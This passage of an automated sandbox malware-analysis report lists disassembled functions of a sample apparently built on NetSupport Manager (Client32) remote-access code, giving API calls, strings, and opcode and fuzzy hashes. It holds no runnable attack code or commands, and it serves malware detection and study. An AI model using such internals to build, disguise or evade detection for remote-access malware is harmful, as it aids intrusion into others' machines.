                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Item$Text$_strncpy$EnabledWindow_memset
                                                                                      • String ID:
                                                                                      • API String ID: 3085755443-3916222277
                                                                                      • Opcode ID: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                      • Instruction ID: 27c08bceae7d385fa57d2e1d5dbc2d5db1b5a631922e4fecc43e69d3347e8bff
                                                                                      • Opcode Fuzzy Hash: 3474633675772f1dfa7fa715227e202affa5940b04f40e4fcdf8bfab1e55feb6
                                                                                      • Instruction Fuzzy Hash: 6D819F75A10706ABE724DB74CC85F9AB3F9BF84704F50C598E2499B181DF71FA448BA0
                                                                                      Function 1106F060 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 1106F397
                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F3E8
                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F408
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeavewsprintf
                                                                                      • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                      • API String ID: 3005300677-3496508882
                                                                                      • Opcode ID: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                      • Instruction ID: 2680b2d19a9bdf8eb0956d8c99ae1cac6e929f7b4449284ea49473897193c40b
                                                                                      • Opcode Fuzzy Hash: 813a8df51b421849a73fb34c3018abb507ddb1008c2509d1f87bc1f88576a655
                                                                                      • Instruction Fuzzy Hash: 9EB1A375E0022A9FDB14DF65CC50FAAB7B9AF49708F4041DCE909A7241EB71A981CF62
                                                                                      Function 11047160 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 330windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindow.USER32(?), ref: 11047211
                                                                                      • _malloc.LIBCMT ref: 110472AD
                                                                                      • _memmove.LIBCMT ref: 11047312
                                                                                      • SendMessageTimeoutA.USER32(?,0000004A,0002046E,00000005,00000002,00002710,?), ref: 11047372
                                                                                      • _free.LIBCMT ref: 11047379
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • Part of subcall function 11043870: _free.LIBCMT ref: 11043907
                                                                                        • Part of subcall function 11043870: _free.LIBCMT ref: 11043927
                                                                                        • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043955
                                                                                        • Part of subcall function 11043870: _strncpy.LIBCMT ref: 11043992
                                                                                        • Part of subcall function 11043870: _malloc.LIBCMT ref: 110439CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                                                      • String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                      • API String ID: 3960737985-1318765656
                                                                                      • Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                      • Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
                                                                                      • Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                      • Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90
                                                                                      Function 1102D1A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0
                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                        • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                        • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                      • _memmove.LIBCMT ref: 1102D24A
                                                                                      • _memmove.LIBCMT ref: 1102D26E
                                                                                      • _memmove.LIBCMT ref: 1102D2A8
                                                                                      • _memmove.LIBCMT ref: 1102D2C4
                                                                                      • std::exception::exception.LIBCMT ref: 1102D30E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1102D323
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                      • String ID: deque<T> too long
                                                                                      • API String ID: 827257264-309773918
                                                                                      • Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                      • Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
                                                                                      • Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                      • Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790
                                                                                      Function 1106B250 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __fread_nolock_fseek$_free_malloc_memset
                                                                                      • String ID: PCIR
                                                                                      • API String ID: 2419779768-1011558323
                                                                                      • Opcode ID: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
                                                                                      • Instruction ID: 1ccd7dea2f775c367685aa3e1c73f4b59a6156879e869ee7e214f681fe7cb03c
                                                                                      • Opcode Fuzzy Hash: 81c3817886dc5dbe589c173359df18430558f154d2dd439929bf4d11460d0680
                                                                                      • Instruction Fuzzy Hash: A94106B1F01318ABEB10CFA4DD41BDEB7BEEF81308F104069EC09AB240DA72A901C795
                                                                                      Function 11015500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetPropA.USER32(?,?), ref: 1101556F
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • Part of subcall function 11015290: BeginPaint.USER32(?,?), ref: 110152BF
                                                                                        • Part of subcall function 11015290: GetWindowRect.USER32(?,?), ref: 110152D7
                                                                                        • Part of subcall function 11015290: _memset.LIBCMT ref: 110152E5
                                                                                        • Part of subcall function 11015290: CreateFontIndirectA.GDI32(?), ref: 11015301
                                                                                        • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 11015315
                                                                                        • Part of subcall function 11015290: SetBkMode.GDI32(00000000,00000001), ref: 11015320
                                                                                        • Part of subcall function 11015290: BeginPath.GDI32(00000000), ref: 1101532D
                                                                                        • Part of subcall function 11015290: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015350
                                                                                        • Part of subcall function 11015290: EndPath.GDI32(00000000), ref: 11015357
                                                                                        • Part of subcall function 11015290: PathToRegion.GDI32(00000000), ref: 1101535E
                                                                                        • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015370
                                                                                        • Part of subcall function 11015290: CreateSolidBrush.GDI32(?), ref: 11015386
                                                                                        • Part of subcall function 11015290: CreatePen.GDI32(00000000,00000002,?), ref: 110153A0
                                                                                        • Part of subcall function 11015290: SelectObject.GDI32(00000000,00000000), ref: 110153AE
                                                                                        • Part of subcall function 11015290: SelectObject.GDI32(00000000,?), ref: 110153BE
                                                                                        • Part of subcall function 11015290: GetRgnBox.GDI32(00000000,?), ref: 110153CB
                                                                                      • GetPropA.USER32(?), ref: 1101557E
                                                                                      • wsprintfA.USER32 ref: 110155B3
                                                                                      • RemovePropA.USER32(?), ref: 110155E8
                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 11015611
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
                                                                                      • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                      • API String ID: 1924375018-841114059
                                                                                      • Opcode ID: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
                                                                                      • Instruction ID: fc00b609a2f261b647cf9ab1963ef075e81928135c8218ba30019119ab5d925d
                                                                                      • Opcode Fuzzy Hash: 349e3198e4ee11d8f994cce4f4d7fe91b877becd306935b01eaf7a21f5783bae
                                                                                      • Instruction Fuzzy Hash: 1131E775E01029ABD714DFA4DC80FBEB379EF4A309F04406AF51A9F148EA7A9940CB71
                                                                                      Function 11005190 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenuItemCount.USER32(?), ref: 1100519E
                                                                                      • _memset.LIBCMT ref: 110051C0
                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 110051D4
                                                                                      • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
                                                                                      • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
                                                                                      • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
                                                                                      • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                      • String ID: 0
                                                                                      • API String ID: 2755257978-4108050209
                                                                                      • Opcode ID: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                      • Instruction ID: ff6163613c0a8cbc830ef1528835912891ededd95cc8b4eaa22ca2fcf9c2cdf5
                                                                                      • Opcode Fuzzy Hash: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                      • Instruction Fuzzy Hash: 71318E70D11219ABEB01DFA4D885BEEBBFCEF46758F008059F951E6240E7759944CB60
                                                                                      Function 1101D1B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 1101D1E0
                                                                                      • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
                                                                                      • _memset.LIBCMT ref: 1101D20A
                                                                                      • RegisterClassExA.USER32(?), ref: 1101D24B
                                                                                      • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 1101D28B
                                                                                      • DestroyWindow.USER32(00000000), ref: 1101D292
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                      • String ID: NSMChatSizeWnd
                                                                                      • API String ID: 2883038198-4119039562
                                                                                      • Opcode ID: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                      • Instruction ID: df00defde950c6a972f57fa33671139d82de9fa74eae4c6bde258e6239c9b3d1
                                                                                      • Opcode Fuzzy Hash: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                      • Instruction Fuzzy Hash: C7314DB5D0021DAFDB10DFA5DD84BEEF7B8EB44628F20012EE925B7240D735A905CB64
                                                                                      Function 11105500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 11105531
                                                                                      • EnterCriticalSection.KERNEL32 ref: 11105548
                                                                                      • GetTickCount.KERNEL32 ref: 1110554E
                                                                                      • GetTickCount.KERNEL32 ref: 111055EB
                                                                                      • LeaveCriticalSection.KERNEL32(111F060C), ref: 111055F8
                                                                                      Strings
                                                                                      • , xrefs: 11105589
                                                                                      • Warning. simap lock held for %d ms, xrefs: 11105609
                                                                                      • Warning. took %d ms to get simap lock, xrefs: 1110555F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$CriticalSection$EnterLeave
                                                                                      • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$
                                                                                      • API String ID: 956672424-3390415482
                                                                                      • Opcode ID: c1740793aff0a857699f8c8da11d168052976df0f5bdff16eb1b228a2dd960db
                                                                                      • Instruction ID: 36f89d150e27e685f8f970f5604c93a837ba150e33a3fa1efe54dd65d22fc2b8
                                                                                      • Opcode Fuzzy Hash: c1740793aff0a857699f8c8da11d168052976df0f5bdff16eb1b228a2dd960db
                                                                                      • Instruction Fuzzy Hash: BA310475D042999FE315CF64C984F5AFBE6EB08328F154265E866EB290D731EC00CB90
                                                                                      Function 1103D160 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 98synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 1103D18F
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
                                                                                      • CloseHandle.KERNEL32(?), ref: 1103D25C
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
                                                                                      • CloseHandle.KERNEL32(?), ref: 1103D279
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
